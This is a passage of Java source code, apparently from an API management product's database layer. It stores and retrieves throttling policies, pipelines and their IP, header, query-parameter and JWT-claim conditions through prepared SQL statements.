queryParameterCondition.getValue()); psQueryParameterCondition.setBoolean(4, queryParameterCondition.isInvertCondition()); psQueryParameterCondition.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(psQueryParameterCondition, null, null); } } private void addIPCondition(IPCondition ipCondition, int pipelineId, Connection conn) throws SQLException { PreparedStatement statementIPCondition = null; try { String sqlQuery = SQLConstants.ThrottleSQLConstants.INSERT_IP_CONDITION_SQL; statementIPCondition = conn.prepareStatement(sqlQuery); String startingIP = ipCondition.getStartingIP(); String endingIP = ipCondition.getEndingIP(); String specificIP = ipCondition.getSpecificIP(); statementIPCondition.setString(1, startingIP); statementIPCondition.setString(2, endingIP); statementIPCondition.setString(3, specificIP); statementIPCondition.setBoolean(4, ipCondition.isInvertCondition()); statementIPCondition.setInt(5, pipelineId); statementIPCondition.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(statementIPCondition, null, null); } } /** * Add JWTCLAIMS throttling condition to AM_JWT_CLAIM_CONDITION table * * @param jwtClaimsCondition {@link JWTClaimsCondition} with claim url and claim attribute * @param pipelineId id of the pipeline which this condition belongs to * @param conn database connection. This should be provided inorder to rollback transaction * @throws SQLException */ private void addJWTClaimsCondition(JWTClaimsCondition jwtClaimsCondition, int pipelineId, Connection conn) throws SQLException { PreparedStatement psJWTClaimsCondition = null; try { String sqlQuery = SQLConstants.ThrottleSQLConstants.INSERT_JWT_CLAIM_CONDITION_SQL; psJWTClaimsCondition = conn.prepareStatement(sqlQuery); psJWTClaimsCondition.setInt(1, pipelineId); psJWTClaimsCondition.setString(2, jwtClaimsCondition.getClaimUrl()); psJWTClaimsCondition.setString(3, jwtClaimsCondition.getAttribute()); psJWTClaimsCondition.setBoolean(4, jwtClaimsCondition.isInvertCondition()); psJWTClaimsCondition.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(psJWTClaimsCondition, null, null); } } /** * Add a Global level throttling policy to database * * @param policy Global Policy * @throws APIManagementException */ public void addGlobalPolicy(GlobalPolicy policy) throws APIManagementException { Connection conn = null; PreparedStatement policyStatement = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String addQuery = SQLConstants.INSERT_GLOBAL_POLICY_SQL; policyStatement = conn.prepareStatement(addQuery); policyStatement.setString(1, policy.getPolicyName()); policyStatement.setInt(2, policy.getTenantId()); policyStatement.setString(3, policy.getKeyTemplate()); policyStatement.setString(4, policy.getDescription()); InputStream siddhiQueryInputStream; byte[] byteArray = policy.getSiddhiQuery().getBytes(Charset.defaultCharset()); int lengthOfBytes = byteArray.length; siddhiQueryInputStream = new ByteArrayInputStream(byteArray); policyStatement.setBinaryStream(5, siddhiQueryInputStream, lengthOfBytes); policyStatement.setBoolean(6, false); policyStatement.setString(7, UUID.randomUUID().toString()); policyStatement.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException ex) { // rollback failed. exception will be thrown later for upper exception log.error("Failed to rollback the add Global Policy: " + policy.toString(), ex); } } handleException("Failed to add Global Policy: " + policy, e); } finally { APIMgtDBUtil.closeAllConnections(policyStatement, conn, null); } } /** * Retrieves global policy key templates for the given tenantID * * @param tenantID tenant id * @return list of KeyTemplates * @throws APIManagementException */ public List<String> getGlobalPolicyKeyTemplates(int tenantID) throws APIManagementException { List<String> keyTemplates = new ArrayList<String>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = null; try { conn = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_GLOBAL_POLICY_KEY_TEMPLATES; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { keyTemplates.add(rs.getString(ThrottlePolicyConstants.COLUMN_KEY_TEMPLATE)); } } catch (SQLException e) { handleException("Error while executing SQL to get GLOBAL_POLICY_KEY_TEMPLATES", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return keyTemplates; } /** * Returns true if the key template exist in DB * * @param policy Global Policy * @return true if key template already exists * @throws APIManagementException */ public boolean isKeyTemplatesExist(GlobalPolicy policy) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = null; try { conn = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_GLOBAL_POLICY_KEY_TEMPLATE; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, policy.getTenantId()); ps.setString(2, policy.getKeyTemplate()); ps.setString(3, policy.getPolicyName()); rs = ps.executeQuery(); if (rs.next()) { return true; } } catch (SQLException e) { handleException("Error while executing SQL to get GLOBAL_POLICY_KEY_TEMPLATE", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return false; } /** * Removes a throttling policy from the database * * @param policyLevel level of the policy to be deleted * @param policyName name of the policy * @param tenantId used to get the tenant id * @throws APIManagementException */ public void removeThrottlePolicy(String policyLevel, String policyName, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement deleteStatement = null; String query = null; if (PolicyConstants.POLICY_LEVEL_APP.equals(policyLevel)) { query = SQLConstants.DELETE_APPLICATION_POLICY_SQL; } else if (PolicyConstants.POLICY_LEVEL_SUB.equals(policyLevel)) { query = SQLConstants.DELETE_SUBSCRIPTION_POLICY_SQL; } else if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { query = SQLConstants.ThrottleSQLConstants.DELETE_API_POLICY_SQL; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equals(policyLevel)) { query = SQLConstants.DELETE_GLOBAL_POLICY_SQL; } try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); deleteStatement = connection.prepareStatement(query); deleteStatement.setInt(1, tenantId); deleteStatement.setString(2, policyName); deleteStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Failed to remove policy " + policyLevel + '-' + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(deleteStatement, connection, null); } } /** * Get API level policies. Result only contains basic details of the policy, * it doesn't contain pipeline information. * * @param tenantID policies are selected using tenantID * @return APIPolicy ArrayList * @throws APIManagementException */ public APIPolicy[] getAPIPolicies(int tenantID) throws APIManagementException { List<APIPolicy> policies = new ArrayList<APIPolicy>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICIES; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICIES; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { APIPolicy apiPolicy = new APIPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(apiPolicy, rs); apiPolicy.setUserLevel(rs.getString(ThrottlePolicyConstants.COLUMN_APPLICABLE_LEVEL)); policies.add(apiPolicy); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return policies.toArray(new APIPolicy[policies.size()]); } /** * Get application level polices * * @param tenantID polices are selected only belong to specific tenantID * @return AppilicationPolicy array list */ public ApplicationPolicy[] getApplicationPolicies(int tenantID) throws APIManagementException { List<ApplicationPolicy> policies = new ArrayList<ApplicationPolicy>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_APP_POLICIES; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APP_POLICIES; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { ApplicationPolicy appPolicy = new ApplicationPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(appPolicy, rs); policies.add(appPolicy); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return policies.toArray(new ApplicationPolicy[policies.size()]); } /** * Get all subscription level policeis belongs to specific tenant * * @param tenantID tenantID filters the polices belongs to specific tenant * @return subscriptionPolicy array list */ public SubscriptionPolicy[] getSubscriptionPolicies(int tenantID) throws APIManagementException { List<SubscriptionPolicy> policies = new ArrayList<SubscriptionPolicy>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICIES; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICIES; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { SubscriptionPolicy subPolicy = new SubscriptionPolicy( rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(subPolicy, rs); subPolicy.setRateLimitCount(rs.getInt(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_COUNT)); subPolicy.setRateLimitTimeUnit(rs.getString(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_TIME_UNIT)); subPolicy.setStopOnQuotaReach(rs.getBoolean(ThrottlePolicyConstants.COLUMN_STOP_ON_QUOTA_REACH)); subPolicy.setBillingPlan(rs.getString(ThrottlePolicyConstants.COLUMN_BILLING_PLAN)); InputStream binary = rs.getBinaryStream(ThrottlePolicyConstants.COLUMN_CUSTOM_ATTRIB); if (binary != null) { byte[] customAttrib = APIUtil.toByteArray(binary); subPolicy.setCustomAttributes(customAttrib); } policies.add(subPolicy); } } catch (SQLException e) { handleException("Error while executing SQL", e); } catch (IOException e) { handleException("Error while converting input stream to byte array", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return policies.toArray(new SubscriptionPolicy[policies.size()]); } /** * Get all Global level policeis belongs to specific tenant * * @param tenantID * @return * @throws APIManagementException */ public GlobalPolicy[] getGlobalPolicies(int tenantID) throws APIManagementException { List<GlobalPolicy> policies = new ArrayList<GlobalPolicy>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_GLOBAL_POLICIES; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_GLOBAL_POLICIES; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { String siddhiQuery = null; GlobalPolicy globalPolicy = new GlobalPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); globalPolicy.setDescription(rs.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION)); globalPolicy.setPolicyId(rs.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID)); globalPolicy.setUUID(rs.getString(ThrottlePolicyConstants.COLUMN_UUID)); globalPolicy.setTenantId(rs.getInt(ThrottlePolicyConstants.COLUMN_TENANT_ID)); globalPolicy.setKeyTemplate(rs.getString(ThrottlePolicyConstants.COLUMN_KEY_TEMPLATE)); globalPolicy.setDeployed(rs.getBoolean(ThrottlePolicyConstants.COLUMN_DEPLOYED)); InputStream siddhiQueryBlob = rs.getBinaryStream(ThrottlePolicyConstants.COLUMN_SIDDHI_QUERY); if (siddhiQueryBlob != null) { siddhiQuery = APIMgtDBUtil.getStringFromInputStream(siddhiQueryBlob); } globalPolicy.setSiddhiQuery(siddhiQuery); policies.add(globalPolicy); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return policies.toArray(new GlobalPolicy[policies.size()]); } /** * Get a particular Global level policy. * * @param policyName name of the global polixy * @return {@link GlobalPolicy} * @throws APIManagementException */ public GlobalPolicy getGlobalPolicy(String policyName) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_GLOBAL_POLICY; GlobalPolicy globalPolicy = null; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, policyName); rs = ps.executeQuery(); if (rs.next()) { String siddhiQuery = null; globalPolicy = new GlobalPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); globalPolicy.setDescription(rs.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION)); globalPolicy.setPolicyId(rs.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID)); globalPolicy.setUUID(rs.getString(ThrottlePolicyConstants.COLUMN_UUID)); globalPolicy.setTenantId(rs.getInt(ThrottlePolicyConstants.COLUMN_TENANT_ID)); globalPolicy.setKeyTemplate(rs.getString(ThrottlePolicyConstants.COLUMN_KEY_TEMPLATE)); globalPolicy.setDeployed(rs.getBoolean(ThrottlePolicyConstants.COLUMN_DEPLOYED)); InputStream siddhiQueryBlob = rs.getBinaryStream(ThrottlePolicyConstants.COLUMN_SIDDHI_QUERY); if (siddhiQueryBlob != null) { siddhiQuery = APIMgtDBUtil.getStringFromInputStream(siddhiQueryBlob); } globalPolicy.setSiddhiQuery(siddhiQuery); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return globalPolicy; } /** * Get a particular Global level policy given UUID. * * @param uuid name of the global polixy * @return {@link GlobalPolicy} * @throws APIManagementException */ public GlobalPolicy getGlobalPolicyByUUID(String uuid) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_GLOBAL_POLICY_BY_UUID; GlobalPolicy globalPolicy = null; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, uuid); rs = ps.executeQuery(); if (rs.next()) { String siddhiQuery = null; globalPolicy = new GlobalPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); globalPolicy.setDescription(rs.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION)); globalPolicy.setPolicyId(rs.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID)); globalPolicy.setUUID(rs.getString(ThrottlePolicyConstants.COLUMN_UUID)); globalPolicy.setTenantId(rs.getInt(ThrottlePolicyConstants.COLUMN_TENANT_ID)); globalPolicy.setKeyTemplate(rs.getString(ThrottlePolicyConstants.COLUMN_KEY_TEMPLATE)); globalPolicy.setDeployed(rs.getBoolean(ThrottlePolicyConstants.COLUMN_DEPLOYED)); InputStream siddhiQueryBlob = rs.getBinaryStream(ThrottlePolicyConstants.COLUMN_SIDDHI_QUERY); if (siddhiQueryBlob != null) { siddhiQuery = APIMgtDBUtil.getStringFromInputStream(siddhiQueryBlob); } globalPolicy.setSiddhiQuery(siddhiQuery); } } catch (SQLException e) { handleException("Error while retrieving global policy by uuid " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return globalPolicy; } /** * Retrieves {@link APIPolicy} with name <code>policyName</code> and tenant Id <code>tenantNId</code> * <p>This will retrieve complete details about the APIPolicy with all pipelins and conditions.</p> * * @param policyName name of the policy to retrieve from the database * @param tenantId tenantId of the policy * @return {@link APIPolicy} * @throws APIManagementException */ public APIPolicy getAPIPolicy(String policyName, int tenantId) throws APIManagementException { APIPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, policyName); selectStatement.setInt(2, tenantId); // Should return only single result resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new APIPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); policy.setUserLevel(resultSet.getString(ThrottlePolicyConstants.COLUMN_APPLICABLE_LEVEL)); policy.setPipelines(getPipelines(policy.getPolicyId())); } } catch (SQLException e) { handleException("Failed to get api policy: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves {@link APIPolicy} with name <code>uuid</code> * <p>This will retrieve complete details about the APIPolicy with all pipelines and conditions.</p> * * @param uuid uuid of the policy to retrieve from the database * @return {@link APIPolicy} * @throws APIManagementException */ public APIPolicy getAPIPolicyByUUID(String uuid) throws APIManagementException { APIPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_BY_UUID_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_BY_UUID_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, uuid); // Should return only single result resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new APIPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); policy.setUserLevel(resultSet.getString(ThrottlePolicyConstants.COLUMN_APPLICABLE_LEVEL)); policy.setPipelines(getPipelines(policy.getPolicyId())); } } catch (SQLException e) { handleException("Failed to get api policy: " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves {@link ApplicationPolicy} with name <code>policyName</code> and tenant Id <code>tenantNId</code> * * @param policyName name of the policy to retrieve from the database * @param tenantId tenantId of the policy * @return {@link ApplicationPolicy} * @throws APIManagementException */ public ApplicationPolicy getApplicationPolicy(String policyName, int tenantId) throws APIManagementException { ApplicationPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_APPLICATION_POLICY_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATION_POLICY_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, policyName); selectStatement.setInt(2, tenantId); // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new ApplicationPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); } } catch (SQLException e) { handleException("Failed to get application policy: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves {@link ApplicationPolicy} with name <code>uuid</code> * * @param uuid uuid of the policy to retrieve from the database * @return {@link ApplicationPolicy} * @throws APIManagementException */ public ApplicationPolicy getApplicationPolicyByUUID(String uuid) throws APIManagementException { ApplicationPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_APPLICATION_POLICY_BY_UUID_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATION_POLICY_BY_UUID_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, uuid); // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new ApplicationPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); } } catch (SQLException e) { handleException("Failed to get application policy: " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves {@link SubscriptionPolicy} with name <code>policyName</code> and tenant Id <code>tenantNId</code> * * @param policyName name of the policy to retrieve from the database * @param tenantId tenantId of the policy * @return {@link SubscriptionPolicy} * @throws APIManagementException */ public SubscriptionPolicy getSubscriptionPolicy(String policyName, int tenantId) throws APIManagementException { SubscriptionPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICY_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICY_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, policyName); selectStatement.setInt(2, tenantId); // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new SubscriptionPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); policy.setRateLimitCount(resultSet.getInt(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_COUNT)); policy.setRateLimitTimeUnit(resultSet.getString(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_TIME_UNIT)); policy.setStopOnQuotaReach(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_STOP_ON_QUOTA_REACH)); policy.setBillingPlan(resultSet.getString(ThrottlePolicyConstants.COLUMN_BILLING_PLAN)); InputStream binary = resultSet.getBinaryStream(ThrottlePolicyConstants.COLUMN_CUSTOM_ATTRIB); if (binary != null) { byte[] customAttrib = APIUtil.toByteArray(binary); policy.setCustomAttributes(customAttrib); } } } catch (SQLException e) { handleException("Failed to get subscription policy: " + policyName + '-' + tenantId, e); } catch (IOException e) { handleException("Error while converting input stream to byte array", e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves {@link SubscriptionPolicy} with name <code>uuid</code> * * @param uuid name of the policy to retrieve from the database * @return {@link SubscriptionPolicy} * @throws APIManagementException */ public SubscriptionPolicy getSubscriptionPolicyByUUID(String uuid) throws APIManagementException { SubscriptionPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICY_BY_UUID_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICY_BY_UUID_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, uuid); // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new SubscriptionPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); policy.setRateLimitCount(resultSet.getInt(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_COUNT)); policy.setRateLimitTimeUnit(resultSet.getString(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_TIME_UNIT)); policy.setStopOnQuotaReach(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_STOP_ON_QUOTA_REACH)); policy.setBillingPlan(resultSet.getString(ThrottlePolicyConstants.COLUMN_BILLING_PLAN)); InputStream binary = resultSet.getBinaryStream(ThrottlePolicyConstants.COLUMN_CUSTOM_ATTRIB); if (binary != null) { byte[] customAttrib = APIUtil.toByteArray(binary); policy.setCustomAttributes(customAttrib); } } } catch (SQLException e) { handleException("Failed to get subscription policy: " + uuid, e); } catch (IOException e) { handleException("Error while converting input stream to byte array", e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves list of pipelines for the policy with policy Id: <code>policyId</code> * * @param policyId policy id of the pipelines * @return list of pipelines * @throws APIManagementException */ private ArrayList<Pipeline> getPipelines(int policyId) throws APIManagementException { Connection connection = null; PreparedStatement pipelinesStatement = null; ResultSet resultSet = null; ArrayList<Pipeline> pipelines = new ArrayList<Pipeline>(); try { connection = APIMgtDBUtil.getConnection(); pipelinesStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_PIPELINES_SQL); int unitTime = 0; int quota = 0; int pipelineId = -1; String timeUnit = null; String quotaUnit = null; String description; pipelinesStatement.setInt(1, policyId); resultSet = pipelinesStatement.executeQuery(); while (resultSet.next()) { Pipeline pipeline = new Pipeline(); ArrayList<Condition> conditions = null; QuotaPolicy quotaPolicy = new QuotaPolicy(); quotaPolicy.setType(resultSet.getString(ThrottlePolicyConstants.COLUMN_QUOTA_POLICY_TYPE)); timeUnit = resultSet.getString(ThrottlePolicyConstants.COLUMN_TIME_UNIT); quotaUnit = resultSet.getString(ThrottlePolicyConstants.COLUMN_QUOTA_UNIT); unitTime = resultSet.getInt(ThrottlePolicyConstants.COLUMN_UNIT_TIME); quota = resultSet.getInt(ThrottlePolicyConstants.COLUMN_QUOTA); pipelineId = resultSet.getInt(ThrottlePolicyConstants.COLUMN_CONDITION_ID); description = resultSet.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION); if (PolicyConstants.REQUEST_COUNT_TYPE.equals(quotaPolicy.getType())) { RequestCountLimit requestCountLimit = new RequestCountLimit(); requestCountLimit.setUnitTime(unitTime); requestCountLimit.setTimeUnit(timeUnit); requestCountLimit.setRequestCount(quota); quotaPolicy.setLimit(requestCountLimit); } else if (PolicyConstants.BANDWIDTH_TYPE.equals(quotaPolicy.getType())) { BandwidthLimit bandwidthLimit = new BandwidthLimit(); bandwidthLimit.setUnitTime(unitTime); bandwidthLimit.setTimeUnit(timeUnit); bandwidthLimit.setDataUnit(quotaUnit); bandwidthLimit.setDataAmount(quota); quotaPolicy.setLimit(bandwidthLimit); } conditions = getConditions(pipelineId); pipeline.setConditions(conditions); pipeline.setQuotaPolicy(quotaPolicy); pipeline.setId(pipelineId); pipeline.setDescription(description); pipelines.add(pipeline); } } catch (SQLException e) { handleException("Failed to get pipelines for policyId: " + policyId, e); } finally { APIMgtDBUtil.closeAllConnections(pipelinesStatement, connection, resultSet); } return pipelines; } /** * Retrieves list of Conditions for a pipeline specified by <code>pipelineId</code> * * @param pipelineId pipeline Id with conditions to retrieve * @return list of Conditions for a pipeline * @throws APIManagementException */ private ArrayList<Condition> getConditions(int pipelineId) throws APIManagementException { Connection connection = null; PreparedStatement conditionsStatement = null; ResultSet resultSet = null; ArrayList<Condition> conditions = new ArrayList<Condition>(); String startingIP = null; String endingIP = null; String specificIP = null; boolean invert; try { connection = APIMgtDBUtil.getConnection(); conditionsStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_IP_CONDITIONS_SQL); conditionsStatement.setInt(1, pipelineId); resultSet = conditionsStatement.executeQuery(); while (resultSet.next()) { startingIP = resultSet.getString(ThrottlePolicyConstants.COLUMN_STARTING_IP); endingIP = resultSet.getString(ThrottlePolicyConstants.COLUMN_ENDING_IP); specificIP = resultSet.getString(ThrottlePolicyConstants.COLUMN_SPECIFIC_IP); invert = resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_WITHIN_IP_RANGE); if (specificIP != null && !"".equals(specificIP)) { IPCondition ipCondition = new IPCondition(PolicyConstants.IP_SPECIFIC_TYPE); ipCondition.setSpecificIP(specificIP); ipCondition.setInvertCondition(invert); conditions.add(ipCondition); } else if (startingIP != null && !"".equals(startingIP)) { /* Assumes availability of starting ip means ip range is enforced. Therefore availability of ending ip is not checked. */ IPCondition ipRangeCondition = new IPCondition(PolicyConstants.IP_RANGE_TYPE); ipRangeCondition.setStartingIP(startingIP); ipRangeCondition.setEndingIP(endingIP); ipRangeCondition.setInvertCondition(invert); conditions.add(ipRangeCondition); } } setHeaderConditions(pipelineId, conditions); setQueryParameterConditions(pipelineId, conditions); setJWTClaimConditions(pipelineId, conditions); } catch (SQLException e) { handleException("Failed to get conditions for pipelineId: " + pipelineId, e); } finally { APIMgtDBUtil.closeAllConnections(conditionsStatement, connection, resultSet); } return conditions; } /** * Add Header conditions of pipeline with pipeline Id: <code>pipelineId</code> to a * provided {@link Condition} array * * @param pipelineId Id of the pipeline * @param conditions condition array to populate * @throws APIManagementException */ private void setHeaderConditions(int pipelineId, ArrayList<Condition> conditions) throws APIManagementException { Connection connection = null; PreparedStatement conditionsStatement = null; ResultSet resultSet = null; try { connection = APIMgtDBUtil.getConnection(); conditionsStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_HEADER_CONDITIONS_SQL); conditionsStatement.setInt(1, pipelineId); resultSet = conditionsStatement.executeQuery(); while (resultSet.next()) { HeaderCondition headerCondition = new HeaderCondition(); headerCondition.setHeader(resultSet.getString(ThrottlePolicyConstants.COLUMN_HEADER_FIELD_NAME)); headerCondition.setValue(resultSet.getString(ThrottlePolicyConstants.COLUMN_HEADER_FIELD_VALUE)); headerCondition.setInvertCondition(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_IS_HEADER_FIELD_MAPPING)); conditions.add(headerCondition); } } catch (SQLException e) { handleException("Failed to get header conditions for pipelineId: " + pipelineId, e); } finally { APIMgtDBUtil.closeAllConnections(conditionsStatement, connection, resultSet); } } /** * Add Query parameter conditions of pipeline with pipeline Id: <code>pipelineId</code> to a * provided {@link Condition} array * * @param pipelineId Id of the pipeline * @param conditions condition array to populate * @throws APIManagementException */ private void setQueryParameterConditions(int pipelineId, ArrayList<Condition> conditions) throws APIManagementException { Connection connection = null; PreparedStatement conditionsStatement = null; ResultSet resultSet = null; try { connection = APIMgtDBUtil.getConnection(); conditionsStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_QUERY_PARAMETER_CONDITIONS_SQL); conditionsStatement.setInt(1, pipelineId); resultSet = conditionsStatement.executeQuery(); while (resultSet.next()) { QueryParameterCondition queryParameterCondition = new QueryParameterCondition(); queryParameterCondition .setParameter(resultSet.getString(ThrottlePolicyConstants.COLUMN_PARAMETER_NAME)); queryParameterCondition.setValue(resultSet.getString(ThrottlePolicyConstants.COLUMN_PARAMETER_VALUE)); queryParameterCondition.setInvertCondition(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_IS_PARAM_MAPPING)); conditions.add(queryParameterCondition); } } catch (SQLException e) { handleException("Failed to get query parameter conditions for pipelineId: " + pipelineId, e); } finally { APIMgtDBUtil.closeAllConnections(conditionsStatement, connection, resultSet); } } /** * Add JWT claim conditions of pipeline with pipeline Id: <code>pipelineId</code> to a * provided {@link 